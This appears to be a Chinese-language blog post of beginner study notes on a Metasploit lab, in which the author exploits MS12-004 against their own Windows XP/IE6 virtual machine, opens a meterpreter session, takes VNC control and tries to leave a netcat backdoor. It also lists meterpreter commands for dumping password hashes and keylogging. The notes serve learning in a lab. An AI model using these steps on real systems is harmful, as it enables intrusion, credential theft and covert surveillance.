metasploit渗透测试学习笔记(一)
来源:互联网 发布:中国进口数据 2008年 编辑:程序博客网 时间:2024/04/29 18:39
对metasploit非常感兴趣,所以最近看了很多的教程。这篇是我模仿作者Breaker写的一篇入门级渗透,真的很入门。还望大神忽视。
单纯的想记录下我学习的结果zzzzzzzzzzzzzzzzzzzzz
环境:
1.kali Linux。
2.XP IE6。
好的,如下zzz:
1.msfconsole
2输入命令 search ms12_004,找 ms12-004 漏洞的利用模块
3.使用那个模块
4.设置一些参数:SRVHOST,payload(载荷) LHOST, URIPATH
5显示参数 show options
6.利用exploit
7用另一个虚拟机XP进入Using URL :http://192.168.10.134:8080/
它已卡死,接着浏览器自动退了吧。
8.Sucessfully! 查看会话:sessions
9.连接会话sessions -i 1,进入了meterpreter,并截图,。
10.run vnc虚拟连接进入,控制主机
11.当然这样不算完结,还要留后门,下次进入。Upload一个nc,(⑥⑥⑥的瑞士军刀)
蛋蛋蛋但是,后门我不会啊,试了好多次没成功,感觉好难搞似得,下次再研究,这次先到这了,已成功拿下我的XP。。。。
好菜 。。。。好水,不怎么懂郁闷。。。。。。。。。。。。。。。。。。
我去喝杯饮料压压惊。。。。。
常用的 Meterpreter命令
Meterpreter 是一个很强大的payload , 具体说明输入help可以看到,
Meterpreter hashdump // 可以看到进程主机帐号和加密后的密码
keyscan_start //开启键盘记录
heyscan_dump // 查看键盘记
keyscan_stop // 关闭键盘
ps // 获取进程主机进程列表
好了感谢教程所有者:Breaker。!! 虽然不认识,但是给了我好大帮助,特别信心啊!!!
(ps:后门不怎么懂(⊙o⊙)。)。哪位大神能否交流交流~~~~~~~~~~~~。
还有1分钟熄灯了,赶紧上传睡觉。
- metasploit渗透测试学习笔记(一)
- metasploit渗透测试学习笔记(二)
- 《metasploit渗透测试指南》学习笔记1
- metasploit渗透测试笔记
- metasploit渗透测试(一)在 Mac 安装 Metasploit-framework
- Metasploit渗透测试 学习路线
- metasploit渗透学习日记一
- metasploit 渗透测试(ftp)
- kali linux metasploit的web渗透测试(一)
- 《metasploit渗透测试魔鬼训练营》学习笔记第四章—web应用渗透
- 《metasploit渗透测试魔鬼训练营》学习笔记第五章--网络服务渗透攻击
- 《metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透
- metasploit 渗透测试笔记(meterpreter篇)
- metasploit 渗透测试笔记(meterpreter篇)
- Metasploit 渗透测试笔记(Meterpreter篇)
- metasploit 渗透测试笔记(meterpreter篇)
- metasploit 渗透测试笔记(基础篇)
- 渗透测试之学习使用metasploit
- ENC28J60学习笔记1
- USACO: Transformation
- 淘宝技术发展
- HDOJ 4671 Backup Plan 构造优先队列
- HDU 3709 Balanced Number
- metasploit渗透测试学习笔记(一)
- socket系列之什么是socket
- mysql数据库查询优化
- 身体各个局部暴瘦的方法!
- 程序只启动一个实例的几种方法
- 我的大四
- POJ 2662-A Walk Through the Forest(最短路+记忆化搜索)
- QuickNews新闻客户端
- 【cocos2dx学习笔记】制作Loding场景